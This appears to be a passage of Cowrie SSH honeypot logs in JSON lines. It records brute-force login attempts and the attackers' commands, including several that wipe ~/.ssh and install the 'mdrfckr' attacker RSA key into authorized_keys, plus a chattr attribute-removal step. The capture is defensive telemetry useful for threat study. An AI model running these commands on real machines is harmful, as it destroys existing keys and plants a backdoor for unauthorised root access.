{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:26:42.804722Z","src_ip":"85.133.199.248","session":"d242c26f97a6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38954,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6f2a886717b","protocol":"ssh","message":"New connection: 212.227.235.229:38954 (1.2.3.4:22) [session: c6f2a886717b]","sensor":"my-vps","timestamp":"2025-09-09T02:26:42.809871Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:26:42.817187Z","src_ip":"212.227.235.229","session":"c6f2a886717b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:26:42.898986Z","src_ip":"85.133.199.248","session":"d242c26f97a6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:26:43.071439Z","src_ip":"212.227.235.229","session":"c6f2a886717b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:26:43.172630Z","src_ip":"212.227.235.229","session":"11f7879da8ed"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:26:43.173358Z","src_ip":"212.227.235.229","session":"11f7879da8ed"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:26:43.430571Z","src_ip":"85.133.199.248","session":"d242c26f97a6"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:26:43.518293Z","src_ip":"85.133.199.248","session":"d6cb9e946c58"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:26:43.525304Z","src_ip":"85.133.199.248","session":"d242c26f97a6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:26:43.562178Z","src_ip":"212.227.235.229","session":"11f7879da8ed"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:26:43.563407Z","src_ip":"212.227.235.229","session":"11f7879da8ed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41930,"dst_ip":"1.2.3.4","dst_port":22,"session":"33e7ec285b50","protocol":"ssh","message":"New connection: 212.227.235.229:41930 (1.2.3.4:22) [session: 33e7ec285b50]","sensor":"my-vps","timestamp":"2025-09-09T02:26:43.937258Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:26:43.937989Z","src_ip":"212.227.235.229","session":"33e7ec285b50"}
{"eventid":"cowrie.login.failed","username":"doris","password":"doris","message":"login attempt [doris/doris] failed","sensor":"my-vps","timestamp":"2025-09-09T02:26:44.100785Z","src_ip":"212.227.235.229","session":"c6f2a886717b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:26:44.318511Z","src_ip":"212.227.235.229","session":"33e7ec285b50"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:26:45.365179Z","src_ip":"212.227.235.229","session":"c6f2a886717b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:26:45.866716Z","src_ip":"212.227.235.229","session":"33e7ec285b50"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:26:47.253292Z","src_ip":"212.227.235.229","session":"33e7ec285b50"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43196,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b96769485e2","protocol":"ssh","message":"New connection: 212.227.235.229:43196 (1.2.3.4:22) [session: 4b96769485e2]","sensor":"my-vps","timestamp":"2025-09-09T02:26:47.632633Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:26:47.635350Z","src_ip":"212.227.235.229","session":"4b96769485e2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:26:48.018009Z","src_ip":"212.227.235.229","session":"4b96769485e2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:26:49.543620Z","src_ip":"212.227.235.229","session":"4b96769485e2"}
{"eventid":"cowrie.session.closed","duration":"10.8","message":"Connection lost after 10.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:26:49.931706Z","src_ip":"212.227.235.229","session":"11f7879da8ed"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:26:49.932923Z","src_ip":"212.227.235.229","session":"4b96769485e2"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11754,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2ef67e97b6b","protocol":"ssh","message":"New connection: 185.152.45.241:11754 (1.2.3.4:22) [session: d2ef67e97b6b]","sensor":"my-vps","timestamp":"2025-09-09T02:26:57.618816Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:26:57.619803Z","src_ip":"185.152.45.241","session":"d2ef67e97b6b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:26:57.699272Z","src_ip":"185.152.45.241","session":"d2ef67e97b6b"}
{"eventid":"cowrie.login.success","username":"root","password":"p@ssw0rt12","message":"login attempt [root/p@ssw0rt12] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:26:57.984716Z","src_ip":"185.152.45.241","session":"d2ef67e97b6b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:26:58.104875Z","src_ip":"185.152.45.241","session":"d2ef67e97b6b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:26:58.105977Z","src_ip":"185.152.45.241","session":"d2ef67e97b6b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:26:58.107324Z","src_ip":"185.152.45.241","session":"d2ef67e97b6b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:26:58.149029Z","src_ip":"185.152.45.241","session":"d2ef67e97b6b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:26:58.368456Z","src_ip":"185.152.45.241","session":"d2ef67e97b6b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:26:58.369349Z","src_ip":"185.152.45.241","session":"d2ef67e97b6b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:26:58.418414Z","src_ip":"185.152.45.241","session":"d2ef67e97b6b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:26:58.419363Z","src_ip":"185.152.45.241","session":"d2ef67e97b6b"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11756,"dst_ip":"1.2.3.4","dst_port":22,"session":"722e437c2fe4","protocol":"ssh","message":"New connection: 185.152.45.241:11756 (1.2.3.4:22) [session: 722e437c2fe4]","sensor":"my-vps","timestamp":"2025-09-09T02:26:58.469476Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:26:58.470275Z","src_ip":"185.152.45.241","session":"722e437c2fe4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:26:58.514307Z","src_ip":"185.152.45.241","session":"722e437c2fe4"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:26:58.759587Z","src_ip":"185.152.45.241","session":"722e437c2fe4"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:26:59.810047Z","src_ip":"185.152.45.241","session":"722e437c2fe4"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11757,"dst_ip":"1.2.3.4","dst_port":22,"session":"154fddec2257","protocol":"ssh","message":"New connection: 185.152.45.241:11757 (1.2.3.4:22) [session: 154fddec2257]","sensor":"my-vps","timestamp":"2025-09-09T02:26:59.854882Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:26:59.869199Z","src_ip":"185.152.45.241","session":"154fddec2257"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:26:59.929119Z","src_ip":"185.152.45.241","session":"154fddec2257"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:27:00.149990Z","src_ip":"185.152.45.241","session":"154fddec2257"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:27:00.201551Z","src_ip":"185.152.45.241","session":"d2ef67e97b6b"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:27:00.202582Z","src_ip":"185.152.45.241","session":"154fddec2257"}
{"eventid":"cowrie.session.closed","duration":31.249083757400513,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:27:04.996862Z","src_ip":"212.227.235.229","session":"5e9bd3ac018b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55768,"dst_ip":"1.2.3.4","dst_port":22,"session":"1908355279c6","protocol":"ssh","message":"New connection: 212.227.235.229:55768 (1.2.3.4:22) [session: 1908355279c6]","sensor":"my-vps","timestamp":"2025-09-09T02:27:26.861719Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:27:26.862556Z","src_ip":"212.227.235.229","session":"1908355279c6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"enc